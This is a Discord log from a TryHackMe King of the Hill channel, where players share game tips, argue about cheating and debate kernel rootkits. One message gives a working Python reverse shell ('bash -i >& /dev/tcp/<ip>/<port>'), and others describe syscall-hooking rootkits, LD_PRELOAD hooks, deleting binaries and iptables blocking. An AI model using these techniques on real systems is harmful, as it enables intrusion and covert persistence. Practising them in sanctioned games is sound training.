#koth

1 messages · Page 9 of 1

timber vale
#

but you said i was dirty that usually means cheating 😂 🤣

#

my main language isnt english so idk what context that was in

#

you just came out and said i was dirty

#

👍

sturdy fox
timber vale
#

dont you have a copy of chattr 🧐

#

you should keep one

sturdy fox
sharp siren
sturdy fox
#

You can run private Matches solo to train right?

naive goblet
#

but you can do some koth machines as normal ctf rooms from tryhackme

#

like food for example

sturdy fox
undone cave
broken pilot
wintry granite
#

can anyone decrypt it?

#

´ql´<z,Ód»øHˆku^ˆçìη… ˜T>;d-‹ŒÅÒæõv°ÁqþlFÊ€·“Wìù…çüëùê|óéúæ\iã¸]³Æà1Ž$Ö1|ä<î(üî:ØzÛK3ÆÏýÐæG¨b¢‡öº!¾ã|i°0EOÍz•dŽøæ‡á_ÌÏãþD¿°¨¤{¦y³VXåÌëø
÷û;cIxÝ΅?yõ¸¬S¿Á"eÜWüpî/b›óƒ¢èyÞ·¬sÇ:œ\H7Ž¸ÖË©[–0 ÎkÞxޘs;‚àã…ǁ>¶Ýø¯#­<ÐNøŽ•Õ4-ÁÑxZG3aTj/ Ãzw÷Ï¿EfAÕé

sharp siren
#

plz no CRYptography in #koth it makes me lose my mind 🙏

steep agate
#

problem solved 👍

sturdy fox
steep agate
#

btw, the only binary that can be deleted is chattr, so there is nothing dirty and nothing against the rules in this, it is always good to have your own chattr compiled in case someone removes it from the machine

sturdy fox
placid fable
#

You can modify the chattr code to write your username every time someone uses it. There was one chattr_borked.c just for this, KoTH.

timber vale
placid fable
#

Yeah lol, worth a try for the first king (root)

#

Replace theirs with this, they should go crazy😂

timber vale
#

👍

north wolf
#

I don't even use chattr binary, this works for with ofc, with necessary includes:

ioctl(fileno(fp), FS_IOC_SETFLAGS, 16);

and, fp here is file_pointer to /root/king.txt

north wolf
#

yeah, I've found 5 footholds so far in fireworks and 6 flags but 6th one didn't work for me || anyways who places sshot of flag 😩and yeah I'd used OCR and also manually checked value of the flag but it still didn't seem to work ||

#

idk I've spent around 3 hrs. in fireworks just searching for footholds and 5 were ones I'd found, and maybe there maybe more

stiff egret
sturdy fox
#

@south pulsar what happened to the machine?

south pulsar
#

I think someone just shutdown the machine

sturdy fox
#

Is it offline i cant even nmap it or ping but i am not king anymore, rude 😂

#

Also how did u find the flags i couldnt find any flag.txt file?

south pulsar
sturdy fox
south pulsar
south pulsar
sturdy fox
south pulsar
sturdy fox
south pulsar
sturdy fox
south pulsar
#

I think 0xReDrag0n did this

south pulsar
sturdy fox
# south pulsar But how ??

The machine connects back to the thm servers to tell them who is king and if the machine cant connect back she cant tell who is king

south pulsar
#

Let's join a different one

sturdy fox
sturdy fox
south pulsar
sturdy fox
light flame
south pulsar
sturdy fox
south pulsar
sour vectorBOT
#

Gave +1 Rep to @sturdy fox (current: #2151 - 1)

sturdy fox
sour vectorBOT
#

Gave +1 Rep to @south pulsar (current: #2151 - 1)

south pulsar
broken pilot
# sturdy fox U won the round only cause of it but idm that u did it😂

Yea deleted flags is a little dirty especially when playing against newer players.... So here's a little tip, create some notes for every machine you play, when you find a flag add them to your notes for that machine... Then when a player wants to delete the flags you already have them in your notes 😉...

#

Also if you'd like to play some practice matches so you can enumerate the machines just hit me up, I'll join the match but I won't be playing so you have full range of the machines, do what you like to them ... @sturdy fox

sturdy fox
sour vectorBOT
#

Gave +1 Rep to @broken pilot (current: #75 - 87)

sturdy fox
#

also if you rename the king.txt it is not longer recognized and gives no points right? cause today i had someone who named it .king.txt and it was not giving anymore points for being king

broken pilot
broken pilot
sturdy fox
broken pilot
#

I mean the key should be find a way in the machine, document how you achieved this, then next game or if you have control of king, look for another way in, document that... There's at least 3-4 ways in for every game... That way if a player patches the machine you might have a way in that they forgot to patch 🤷🏼‍♂️

north wolf
#

id_rsa of of duku, then net-kit ftp's priv esc then straight king!

south pulsar
#

@timber vale why you use 2 id!!! while playing koth ?

timber vale
#

He is just strating out in thm

south pulsar
timber vale
#

🧐

south pulsar
#

that is not the first time

timber vale
south pulsar
timber vale
#

just admit i destroy you in every game so you just want to get back at me 🤣

south pulsar
#

and btw stop using autopwn , play honestly

timber vale
south pulsar
timber vale
south pulsar
#

come then

timber vale
#

😂 i will destroy you like every time

south pulsar
timber vale
south pulsar
#

come then

timber vale
#

🤣 dm me lets choose the game and send me the link i will kick your a**

#

you have a sub i dont

south pulsar
#

ok, i dont chuse the game , its a random

timber vale
#

what if its windows 🧐

south pulsar
#

i dont have fears

timber vale
#

alright dm me the link

north wolf
#

lemme join 😉

timber vale
#

lets do 3 games who win the most dont bother the other anytime 😂

stiff egret
timber vale
timber vale
north wolf
timber vale
#

so its like that

north wolf
#

do what u said, else don't bug around.

timber vale
#

i want a proper game just me and him 1v1 dont do this shit to me 😂

north wolf
timber vale
#

you both come play against me and you have your cheating methods with you thats not fair 😂

north wolf
#

"do what u said".

north wolf
timber vale
north wolf
timber vale
north wolf
#

😆

#

tbh, nones fair here

#

including me

timber vale
north wolf
#

so do what u said shrug

timber vale
#

im still saying i will kick his ass but 1v1 without he dming the ip to anyone

north wolf
#

ohh u decided to run away, fine

timber vale
north wolf
#

@south pulsar maybe @timber vale is scared of u

timber vale
north wolf
timber vale
#

im not scared of him neither im scared from you anyone wants to play a proper game comeone

#

i win or i loose but with my dignity and no cheating from your parts

north wolf
#

I gave him some of my stuff, maybe he compiled them without editing

south pulsar
timber vale
#

some of your cheatings 😂

north wolf
south pulsar
#

@north wolf i think someone need 9999 fake id's to win a koth kekw

timber vale
#

this last 2 weeks i won more games than you two ever won so shut up and close your mouth 😂

north wolf
#

alt acc thingy

#

and u saying kicking *ss of 15 y.o is what made me share my goddies with him

#

else, I didn't care

#

ahem

#

language.

#

@mods 😅

placid fable
#

Guys, just leave it. Follow the rules from now on and be fair, that's all

@.scrubz. a bit of an issue here😄

timber vale
north wolf
timber vale
north wolf
timber vale
north wolf
#

chuck it

#

not talking anymore in this topic.

timber vale
north wolf
#

btw, biggboss izza watching 😆 (gifs lolz)

timber vale
north wolf
broken pilot
#

Can I join the fun later 🥳 😉... Why everyone so mad???

north wolf
south pulsar
timber vale
broken pilot
#

We can do it publicly or private don't matter

north wolf
#

anyways someone wasn't able to do what s/he said

broken pilot
#

Personally I don't see how 2 accts would help take king... Only thing multiple accounts are good for would be to spam resets.....

timber vale
north wolf
#

who knows, lets have a competitive game

#

than arguing here

broken pilot
#

@north wolf I think you may have misread what ch1 was saying... Ch1 is the 15 yr old...

broken pilot
#

Ok when I get off work I will ping you guys and let's orchestrate a big game 😉...

north wolf
#

sure!

final onyxBOT
#

:mute: c.h.1#0 has been muted.

#

:mute: 0x_indranil#0 has been muted.

near lily
sour vectorBOT
#

Gave +1 Rep to @placid fable (current: #40 - 185)

sturdy fox
#

i like how silent it is in here now

south pulsar
#

boom baby

broken pilot
sturdy fox
south pulsar
broken pilot
broken pilot
north wolf
#

yep, real game; coming soon!

#

only on koth!

#

😆

south pulsar
north wolf
north wolf
broken pilot
north wolf
#

exactly, @south pulsar ☝️

broken pilot
#

Get your stuff ready in the mean time 😜

south pulsar
north wolf
#

idk what to get ready, I'll just smoke a cig that's my prep.

broken pilot
#

@north wolf @south pulsar @timber vale and whoever else wants to play

#

15 mins

timber vale
#

@north wolf @south pulsar 5min

broken pilot
#

20 mins

sharp siren
#

I see now why I quit koth, and I don't regret it at all lmao.

fair adder
#

Mission: impossible

north wolf
#

😆

north wolf
north wolf
#

nice, there's at least a guy (always) on koth queue lol

timber vale
fallen palm
#

Why I am not able to join koth ? It's saying not found

sturdy fox
fallen palm
#

Nah, normal koth but now the problem is solved

fallen palm
#

And how did you entered in the machine so fast.? @timber vale

timber vale
#

a python one

fallen palm
#

I uploaded a reverse shell.?

timber vale
fallen palm
#

I didn't understand what you mean bro

#

You mean I need to upload a reverse shell, right.?

timber vale
#

i used port 5000 uploaded a revshell

#

it needs to be a python script 👍

#

that give you a shell

#
#!/usr/bin/python3
import os
os.system("bash -i >& /dev/tcp/<ip>/<port> 0>&1")

you can just use that

fallen palm
#

Okie ty

timber vale
fallen palm
#

Yeah thats their limit but i was facing different issue

timber vale
#

im recently experiencing other bugs i dont see the type of the machine i need to refresh and the ip also and i need to refresh to update the points like there is no live update on anything

fallen palm
#

and my koth pagge is also not updating automatically every minute

timber vale
#

yeah

#

you need to refresh

fallen palm
#

maybe they are doing maintanance as mentioned in the notification bar

fallen palm
timber vale
#

i just stopped using it to monitor king i started using watch -n 1 curl -s ip:9999

fallen palm
#

Ooo

timber vale
#

but the problem is resets when some one reset and the machine doesnt shutdown you can never know without refresh

timber vale
#

no the ip of the machine the koth service running on port 9999 tells you the king

fallen palm
#

oh

violet zealot
timber vale
#

yeah i got nothing else to do i train i go to the gym but this is my vacation and i dont have school so i have full time koth 😂
you're not gonna get rid of me that easily i will continue to be in every single game each time i can 😂 to take the win from you

#

@violet zealot @fair adder

violet zealot
#

From who? I don't play koth anymore

sturdy fox
#

Does someome know if bluez8866 is cheating?

#

I am in the shrek machine with him, he kept killing my connection and now he turned ssh off after making himself king 💀

#

Ssh doesnt show on the ports anymore and i get the error connection refused, but somehow he is still connected, someone tips?

broken pilot
#

Well a good technique would be to add some kind of persistence once you get on the box that way you won't need ssh. You could also try scanning again for all ports maybe he changed ssh port. There should also be another way on the machine besides ssh if he hasn't already patched

sturdy fox
#

All the ways, as far as i know for the shrek machine, leave ssh keys, no i scanned all ports and only 22, it said closed ssh.

civic vortex
#

@north wolf I thought youre a changed man?

sturdy fox
civic vortex
sturdy fox
#

so the shell

light flame
#

Or any other shell, like on debian(based) systems /bin/sh is a symlink to /bin/dash iirc, so if they didn't remove all binaries it's likely that only the symlink /bin/sh is removed and /bin/dash can still be used.

fading moat
#

Where can I find the linux headers for the food machine? (4.15.0-91-generic)

north wolf
north wolf
sour vectorBOT
#

Gave +1 Rep to @civic vortex (current: #881 - 4)

violet zealot
#

im pretty sure it's against the rules

north wolf
#

my bad

#

but my rootkit makes me wonder since there's no king.txt in /root but cat /root/king.txt responds fine

fading moat
#

How do I compile my LKM for the food machine? Where can I find the headers

violet zealot
#

if u are talking about the linux versions, im pretty sure matheuz or someone else shared them

#

.

#

mods should pin it for further related questions 👍

north wolf
#

yaay! now my rootkit works as expected, but idk why i see two usernames lol

#

@south pulsar @upper basin @timber vale @broken pilot ?

timber vale
#

im eating dinner rn

#

im going to play with you the next game after 20min

fading moat
violet zealot
fading moat
#

Mistapped sorry

fading moat
timber vale
#

@north wolf

fading moat
#

@north wolf may i dm you

north wolf
sturdy fox
timber vale
sour lodge
#

@timber vale wth did yoy do to that king file ?? 😂😂 good game

timber vale
#

@sour lodge

sour lodge
#

MrMarket

timber vale
timid ore
timber vale
timber vale
#

@north wolf

timber vale
timber vale
timber vale
timber vale
fading moat
#

@quiet schooner can I DM you about koth?

timber vale
timber vale
timber vale
sturdy fox
#

Bro fr what is Bluez doing??? He got in the machine again and turned off the ssh

sturdy fox
#

I think he even deleted ssh cause there is no ssh anymore💀

long vessel
#

are you talking about shrek machine ?

young bramble
#

23 king changes 😄

long vessel
sturdy fox
sturdy fox
#

Ohh u were in the Match too

young bramble
sturdy fox
steep agate
violet zealot
#

so maybe mods can take some actions, because tbh i see many people cheat but nobody gets banned

broken pilot
fair adder
#

Anyone from NSW?

violet zealot
#

if u broke the rules just once, it's okey but if u cheat like every game u should be banned

broken pilot
violet zealot
#

it's not because u can fix it that u can do it cri

broken pilot
#

Yea but should you be banned for that...

violet zealot
#

again, if it's once no, but if u do it repeatedly then yes

#

otherwise what's the point of having rules?

broken pilot
#

Now I can see rm -rf / or modifying koth binary or attacking others players being bannable

sturdy fox
#

i only played against him 2 times and he cheated both times idk if he does it all the times. i reported him both times now, im just not gonna go in a game where he is inside.

steep agate
#

if that's the case

sturdy fox
steep agate
sturdy fox
#

or in that case with the closed port

steep agate
#

for scan all ports

#

by default nmap does not scan all open ports

bronze mirage
steep agate
sturdy fox
sturdy fox
bronze mirage
sturdy fox
broken pilot
#

I can see blatantly cheating being cause for ban under certain circumstances... But I think there are some grey lines in the rules and it would then depend on the perspective of what is actually considered cheating... Cuz rm /bin/bash no problem can still use sh... rm -rf / ... Problem that was blatantly used to ruin the machine for everyone .... Blocking ip's using iptables.... Blatantly breaking rules... Alias on echo... Sneaky... Can still change alias and machine is still up... All depends

sturdy fox
steep agate
fading moat
#

What does that even achieve, it ruins the match for everyoje

sturdy fox
fading moat
#

Its called being a huge dick

sturdy fox
light flame
sturdy fox
broken pilot
#

But this also demonstrates the importance of persistence... There are other ways in the machine besides ssh... Bet they didn't patch all of them...

sturdy fox
#

also bluez keeps disconnecting the users, so if u play against him be aware of that 😉

sturdy fox
sturdy fox
broken pilot
#

Flood his terminal with urandom make him kill his own shells 🤣

sturdy fox
#

i know what u mean but bro im a noob idk how to do all that xd

broken pilot
sturdy fox
#

i know how to get in the machine but idk how to keep them yet

broken pilot
sturdy fox
broken pilot
#

You gotta think in real life situations they are not going to be playing by the rules.... You will need to adapt to the environment you are in 😉...

broken pilot
#

Could also use something like pspy64

sturdy fox
placid fable
broken pilot
timber vale
sturdy fox
broken pilot
#

Ahhh ok it will probably be late for you then... Maybe over the weekend just ping me

sturdy fox
broken pilot
twin ore
#

KOTH? Anyone? Huh?

#

I'm tired of @timber vale destroying every KOTH I'm a part of haha.

timber vale
#

its 3:12 am im going to sleep but i will play with you tomorrow if you want 👍

twin ore
#

Bro...just oversleep for a bit so I can at least get the false impression that I may win.

timber vale
#

i will stay sleep for at least the next 8-9 hours so you can play all you want rn 😂

vague shuttle
twin ore
#

Ehhhhh I’ll probably be in bed

vague shuttle
#

Ah alr

sturdy fox
#

crazy how everyone is in a different timezone

timber vale
#

any one having problems with vpn?

#

i tried changing servers and redownload configuration but it just doesnt connect
my internet is good my ping for google.com is 73ms
2024-08-03 08:02:31 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2024-08-03 08:02:31 VERIFY EKU OK
2024-08-03 08:02:31 VERIFY OK: depth=0, CN=server
2024-08-03 08:03:32 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)
2024-08-03 08:03:32 TLS Error: TLS handshake failed
2024-08-03 08:03:32 SIGUSR1[soft,tls-error] received, process restarting
2024-08-03 08:03:32 Restart pause, 1 second(s)
2024-08-03 08:03:33 TCP/UDP: Preserving recently used remote address: [AF_INET]54.76.30.11:1194
2024-08-03 08:03:33 Socket Buffers: R=[212992->425984] S=[212992->425984]
2024-08-03 08:03:33 UDPv4 link local: (not bound)
2024-08-03 08:03:33 UDPv4 link remote: [AF_INET]54.76.30.11:1194
2024-08-03 08:03:33 TLS: Initial packet from [AF_INET]54.76.30.11:1194, sid=d472c3c2 ffd9599d
2024-08-03 08:03:33 VERIFY OK: depth=1, CN=ChangeMe
2024-08-03 08:03:33 VERIFY KU OK
2024-08-03 08:03:33 Validating certificate extended key usage
2024-08-03 08:03:33 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2024-08-03 08:03:33 VERIFY EKU OK
2024-08-03 08:03:33 VERIFY OK: depth=0, CN=server

this whole log gets repeated over and over again without connecting to anything

sturdy fox
#

Hey @glass isle u in yet?

glass isle
#

i only have mysql flag

#

ssh is down or smth

sturdy fox
glass isle
sturdy fox
#

yeah H4DES is a strong player

glass isle
#

i didnt rescan all ports after finding all

#

i got a ssh user from sql database so ill try

#

pw got changed NotLikeThis

#

gotta go... goodluck @sturdy fox

sturdy fox
#

yeah Match is over xd

glass isle
#

gg hades

broken pilot
placid fable
#

I was just installing Docker on my host to escape the containers 😂
How did you do that? Plain curl?

twin ore
broken pilot
placid fable
#

aliali..0541, why are you killing the login sessions? And, the /home/ashu/flag.txt has root:root user/group. This is against the rules SureBruh

north wolf
#

who is bluez?

north wolf
glass isle
#

did someone already change http admin page PWs? 😮

sturdy fox
tacit ridge
#

Hey kaali01🙌🙌🙌

tacit ridge
#

Really changing passwords is allowed?

sturdy fox
#

why shouldnt it be?

tacit ridge
#

Then if I am unable to find the root first then it's like done

#

I can't do anything one who becomes king is king

sturdy fox
#

having the passwords is normaly not the way to get root, as far as i know

placid fable
charred hare
timber vale
#

every one is having fun in koth without me 😂 i reinstalled the whole vm but im still cant connect to any openvpn not thm nor htb have fun guys 👍

timber vale
# fathom yacht

i tried a new vpn server and redownloading the configuration that didnt work also. did you try it?

fathom yacht
timber vale
# fathom yacht I tried every single VPN server in the THM access page.

yeah i did that too but nothing changed
i will try to reinstall my vm but this time test htb first see if it works cause my htb vpn was working fine before this
first time my vpn malfunctioned i restarted my machine and i found that the configuration in /etc/network/interfaces for eth0 is deleted
i restored that but also couldnt get network access cause when i do ip route i see nothing so no route i fixed that but nothing changed

wheat flower
#

how long is the Match Penalty?

#

oh different website

frail nymph
timber vale
frail nymph
timber vale
broken pilot
#

🤣 🤣 🤣 not cool to remove binaries.... how you gonna take king from me now 🤣 🤣 ..... aliali..0541 ....

#

hahahahaha you tried to mount and remove both mount and umount..... but now it has backfired on you 😉 Good Luck have fun 😜

broken pilot
#

hahahahahhaha weak bro .... you didnt have to poweroff the machine

#

anyways GG tipsfedora see ya next time

placid fable
broken pilot
civic vortex
#

they are so funny, turning off machine to help us secure king

fading moat
#

@broken pilot would open sourcing my rootkit break the game

sturdy fox
#

i still think rootkits are cheating

fading moat
#

Since it's not breaking the rules it gives you the complete freedom of using a rootkit yourself

#

Now I can see why it could be considered as cheating but it's not

sturdy fox
#

I mean a rootkit is autopwn and autohardening isnt it?

light flame
fading moat
sturdy fox
#

But im sure THM knows about rootkits getting used and if they dont do something ig do it

fading moat
#

While copy pasting them isn't

sturdy fox
#

cause for me auto means that for example a programm does it for me

fading moat
sturdy fox
fading moat
#

So you do think that putting the commands in a script instead of copy pasting them directly in your shell is considered autopwn

#

Well, if you have mixed up definitions how come you say rootkits are autopwn

sturdy fox
#

thats why i said at the beginning "i still think"

fading moat
light flame
fading moat
#

Not trying to argue here, just so you know

sturdy fox
fading moat
#

Define a rootkit

#

A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software.

So no, you need a foothold in the machine and rootkits are meant to provide a backdoor. Not to gain initial access.
In our scope, koth, rootkits are loaded after you become root, to manipulate kernel space functions to protect the king

#

Generally speaking

light flame
fading moat
sturdy fox
fading moat
sharp siren
#

@fading moat out of wonder where you able to make your own write_hook?

fading moat
sharp siren
fading moat
#

Hey @broken pilot wyt about what I said on open sourcing my kit

broken pilot
# fading moat <@485135593249177610> would open sourcing my rootkit break the game

Idk honestly, it's looking like more and more people are using rootkits to control king.... At some point it's just going to become who has the better rootkit.... But I'm also noticing that this is the main way some ppl control king... And if we created a game where no rootkits could be loaded I'm wondering if they would still be able to control king or would this make it a fair match.. cuz when you use a rootkit on a newer player, it could make them no longer want to play or resort to cheating.... I think rootkits should be last option when playing against better players instead of used on every single game against every player....

fading moat
sharp siren
fading moat
#

Thing*

fading moat
fading moat
light flame
broken pilot
broken pilot
fading moat
#

We would know better if you test it sometime ;)

light flame
broken pilot
broken pilot
broken pilot
light flame
#

It's possible, just find an edge case

broken pilot
# light flame Yeah

Were you successful?? It's a lot harder than finding a loop hole in a script or just killing the PID of the running script...

light flame
#

But I only did this with one rk, so idk about other's

fading moat
fading moat
#

I'll be home tonight

broken pilot
fading moat
#

Yeah fs

#

Currently hitting some biceps

#

Mid set rootkit discussion is elite

broken pilot
steep agate
# fading moat Yeah my rootkit is relatively unstoppable

It's actually very easy to detect your rootkit, craig the creator of Agentless Linux Security also agrees with this, the problem itself is just adding correctly to lsmod, restoring completely, which I can't work on at the moment because I have other issues To resolve this, don't think you're a god because of this, just copy & paste what already exists on the xcell blog, among others 😄

fading moat
fading moat
steep agate
fading moat
steep agate
#

But creating a tool from scratch to detect and remove rootkits, try it, because making a rootkit is easy, you can just look at xcellerator 😝

#

developing new tricks for defense

light flame
fading moat
steep agate
#

Nah, you said it yourself that the xcell blog helped a lot

fading moat
#

This guy 😂 does it mean I just yanked everything I found on there

steep agate
#

I just said the reality, your rootkit is not unstoppable, it never will be, and next to an EDR/XDR agent for Linux, your rootkit seems like a toy to deal with 😄

fading moat
#

What would you care

broken pilot
near lily
#

Saying "My rootkit is unstoppable" and having a counter argument applied then saying "you're trying to prove something" is terrible arguing.

#

Really it's tit for tat.

light flame
fading moat
near lily
#

No point bringing Tim in to this, and I'm not saying matheuz is innocent either.

#

You both need to cool it, if you don't have anything nice to say, probably best you just stop.

steep agate
#

everyone saw this

#

tagging me there

#

If you hadn't started all this there in the f11snipe server chat, I would still not know of your existence

broken pilot
fading moat
fading moat
near lily
#

Im not asking, I'm tell you both to stop before I mute the pair of you.

fading moat
#

Please stop trying to make fun of me, it's annoying and doesn't look good for you. Please

steep agate
broken pilot
#

This is why we can't have nice things guys 🤣🤣🤣🤣 just playing...

fading moat
steep agate
#

I was aggressive towards you? lol, I even tried to help you understand what imperius did

fading moat
#

Sure buddy

#

I dont care anymore

steep agate
#

Are you acting like a poor thing now? lmao

steep agate
fading moat
#

You'll get us both muted

final onyxBOT
#

:mute: anti_sysadmin#0 has been muted.

fading moat
#

So kindly stop talking

near lily
#

You're in no way innocent.

fading moat
near lily
#

You kept talking

fading moat
#

Huh

placid fable
fading moat
placid fable
sour vectorBOT
#

Gave +1 Rep to @fading moat (current: #1092 - 3)

fading moat
#

And I discovered some very interesting techniques on the way

steep agate
#

eBPF is also a good way to hook syscalls 😄

placid fable
#

That's great, elixir is just OGblobheart

#

Packet Filter?

steep agate
steep agate
#

with eBPF you can detect rootkits, for example the aquasecurity tracee, but you can also hook syscalls with it

#

There are security solutions on the market that use eBPF

fading moat
steep agate
#

XDR for Linux it also has very good protection against rootkits

fading moat
steep agate
#

=

#

ebpf

fading moat
#

Cool

steep agate
steep agate
fading moat
steep agate
placid fable
#

@fading moat Yeah, got it working. The kernel module, for hooking into the syscalls fawaz

fading moat
placid fable
#

Yeah, for now I was following along the post that Matheuz mentioned

north wolf
#

./doit.sh

placid fable
#

From what I can see, it's effective in the userland. And IIRC, a static binary won't be needing to load the dynamic symbols from your shared library.

There has been some talk around the Linux Kernel Modules (LKMs) which would run with more privilege in kernel space.

#

Matheuz and others have worked or are working on something similar for KoTH's king foothold

placid fable
#

I was studying the LKMs, and have written a little something for KoTH. Lemme know if you wanna test yours against it, it's pretty barebone atm.

placid fable
light flame
gray perch
#

GG @timid ore!
my first time doing koth. Cooked 😂

gray perch
#

btw kaali, if you see this would love if you can explain your methodology and the tcpwrapper thing :)

tacit ridge
#

Just asking guys, do people have some kind of automation setup, They get king within 10mins, I am not able to crack it wiithin 1 hour😮‍💨🥲

#

How many boxes are there in all of koth ?

sturdy fox
tacit ridge
#

Yes

sturdy fox
#

What machine?

sturdy fox
#

@tacit ridge we can make private games if u wanna learn the machines

sturdy fox
timber vale
light flame
timber vale
light flame
#

syscalls or functions in libc?

timber vale
#

but there are wrapers around them in glibc ofcourse

timber vale
light flame
#

this was about a rootkit that uses ld preload, so then he needs the libc functions

#

openat + openat2 are indeed libc functions, but they're harder to intercept and do checks on

#

because it takes a file descriptor to a directory as argument you have to get the file/directory associated with the fd

timber vale
#

👍

sturdy fox
#

why are only Wizard or higher lvl people on rn? 🥲

tardy imp
#

It seems I got really lucky on my first koth there weren't any high level

sturdy fox
#

i have, God, Harry, Master and Hacker against me rn xd

sonic belfry
young bramble
# sturdy fox i have, God, Harry, Master and Hacker against me rn xd

the THM rank is different than koth experience. The 0xD-GOD rank means the user completed a certain number of THM rooms that got him to level 13 (max) but this has nothing to do with koth games. If he plays for the firs time, or didn't manage to study the machine you play and find a fast way in, you might win, as you already did, with 49 minutes of king. And Lion machine has the fastest root foothold that can get you king in seconds.
BTW I guess you already know there are websites like F11snipe's koth.guru that you can use to check on your opponents and make an idea of koth experience and how many games he played...

sturdy fox
#

yeah i know that the level shows like how many rooms but with rooms u also get knowledge

young bramble
#

You also get knowledge working as a linux sysadmin, or cybersecurity analyst, but when it comes to this competitive game of attack and defense, the speed is more important than knowledge. It doesn't matter if you know how to exploit a vulnerability if someone else exploited it before you and patched it. It doesn't matter if you got in and patched all the ways you know, if someone else know a different way in, finds a way to privesc, loads his lkm and locks you down...Best way to train IMO is private games, Enumerate, get in, get root, and enumerate more to find fastest way in but also as many alternative ways in.

young bramble
young bramble
# charred hare The is a cool site

Yes it is and thank F11snipe for creating it and making it available for community. I guess it needs to be updated tho because I did't see any game with new released Fireworks koth machine... somehow those games are skipped

sour vectorBOT
#

Gave +1 Rep to @charred hare (current: #14 - 559)

broken pilot
#

@young bramble Will let you know when it's finished... Also planning on putting together a player profile page with additional metrics like nemesis (who you lose to the most) and nemesis of and a few others

sour vectorBOT
#

Gave +1 Rep to @broken pilot (current: #73 - 88)

timid ore
sturdy fox
#

Gg @light flame i dont wanna do the remount stuff the hole time, imme learn a bit😂

light flame
light flame
obsidian lark
light flame
obsidian lark
#

yeah sure

timber vale
# frail nymph There is no harm checking. It may be updated.

i had the same issue on my mac mini which has no antivirus any new configuration of vpn dont work for me but i had an old backup of my files with an old vpn configuration im using its working on both my laptop and my mac mini 👍 idk why i cant use a new vpn configuration 🧐

timber vale
timber vale
timber vale
timber vale
timid ore
#

anyone

sturdy fox
#

ur boring @fallen palm have fun gg

fallen palm
#

That guy was you?

#

Check DM @sturdy fox

obsidian lark
#

King of the hill channel question

sturdy fox
obsidian lark
#

I am doing a king of the hill challenge now but my vbox seems to be running very slow, and suggestions on how to speed up my response?

sturdy fox
obsidian lark
#

virtual box

#

Is the attack box better?

sturdy fox
#

nah virtual box is better, are u already connected with the target or is ur own shell working slow?

#

i had it sometimes that the target was pretty slow

obsidian lark
#

I am connected , I am doing things like nmap, nikto just to get started, is there something I should do to start faster?

sturdy fox
obsidian lark
#

Thank you that is a start, I will use rustscan in the next challenge.

sturdy fox
#

are you using nmap -A cause that is realy realy slow

obsidian lark
#

I use only min to get the open ports (-Pn -p- T4)

glass isle
#

so on a linux machine i put myself as king in the king file but what about windows machines?

sturdy fox
civic vortex
fallen palm
#

Anyone here found all 6 flags in fireworks koth.? I found 5 only.

young bramble
fallen palm
#

Just a random guess as many machines have 6

young bramble
#

food, shrek, fortune, panda, offline have 8, hackers have 9, carnage and hogwarts have 7...

fallen palm
#

Huh

#

I knew they had 6 💀

#

I should go more deep then from next time.

#

👀

sturdy fox
#

oh the right side of the flag submission button there is a flag and i tells you how many flags on the machine are btw

obsidian lark
#

what is the first step in the king of the hill challenge?

sturdy fox
obsidian lark
#

I got that , then did nikto but still struggling to find flag

south pulsar
#

@light flame you skinny kidde

sturdy fox
#

lol what happened now

light flame
south pulsar
fallen palm
fading moat
#

New way to communicate with the LKM.

#

Using a trusted procfs entry as a front (like kallsyms), no syscall hooking is taking place and everything looks normal

#

I also went over the kernel to give arbitrary processes root credentials, while the kernel purposefully doesn't provide such an API

fading moat
#

I hope you guys like my new creation :) code will be open sourced after I clean it up and perhaps add some more features

violet zealot
#

interesting 👍

light flame
#

Does someone know why you can't set your ruid to 0 if your euid is 0 on carnage? If I run python3 -c 'import os;os.setuid(0);os.system("/bin/bash")', I get a PermissionError.

violet zealot
#

u probably need sudo perm with python to use these command i guess

light flame
sturdy fox
#

@timber vale how are u in 3 games at once?

timber vale
#

i play the first game get king go to the other ones 👍

sturdy fox
#

i thought u only can be in 2 at once lol

broken pilot
mossy hearth
#

how comes😂

sturdy fox
#

U just cloned urself congrats😂

timber vale
timber vale
#

@south pulsar what is this this TestUser8422 wasnt here when the game started so he must have got a link and the only thing he did is just reset
he also never had activity until today 🧐

south pulsar
timber vale
#

he must have a link the reset needed two persons thats why

south pulsar
timber vale
#

you saying this egyptian guy sent him the link 😂

#

to hit reset 😂

south pulsar
#

i was playing htb now

obsidian lark
grim slate
#

bruhs i have a doubt in koth i can find all flags but i cant make the king time anybody say how can get into it? i need steps not solution

sturdy fox
sturdy fox
#

@timber vale dont u get bored?

light flame
south pulsar
#

what

#

you have proofs ?

#

show me then

light flame
#

no, but I will be happy if the box isn't randomly reset

south pulsar
#

ok

light flame
#

@south pulsar congrats, you reset enough to make me loose😂

south pulsar
timber vale
violet zealot
#

naah that's definitely sus

civic vortex
#

At least he's going soft core mode, not like his friend WildInsect

#

And he was polite to you

fair adder
#

Why does koth always cause this behaviour 💀

sturdy fox
#

Cause its a game, always people like this in games😅

fair adder
#

Mhh

fading moat
civic vortex
#

💀

steep agate
#

btw, great job for create koth.guru @fossil pecan 🙏

civic vortex
#

Agreed

obsidian lark
#

bro attacking bravosec? damn

south pulsar
obsidian lark
south pulsar
final onyxBOT
#

@south pulsar has been warned.

civic vortex
#

idk whats wrong with them

fathom elk
#

😂

civic vortex
near lily
civic vortex
timber vale
#

aliali..0541 why you play very dirty remove binaries and reboot machine ....
😂 you wont win removing mount will only backfire on you cuz mouting and umounting is possible in other ways ....

dreamy sparrow
#

is having redirects from a koth website to it opening applications on your computer allowed. Im guessing people are not allowed to modify the web-page so this happens.

civic vortex
#

koth team should consider writing a LKM to hook all operations that can break the rules

steep agate
# civic vortex koth team should consider writing a LKM to hook all operations that can break th...

This is a very interesting issue to discuss, because in fact an LKM is something very strong against players who do not have the slightest knowledge about a rootkit, and most of the time few, very few players even know how to play against it and there are few players that can count on a hand that uses the LKM to protect the king, in addition to the fact that an LKM connects syscalls, changing the default behavior

civic vortex
steep agate
#

LKM I say, created to protect the king, if it's something common like hiding processes or directories, I don't see why they should be banned, why a userland rootkit can also do the same, the difference is that userland is easier to be detected, and there is also a way to create a user rootkit to protect the king, however, something at the kernel level is always much stronger and difficult to remove

civic vortex
#

I guess its not hard for them to make one

steep agate
#

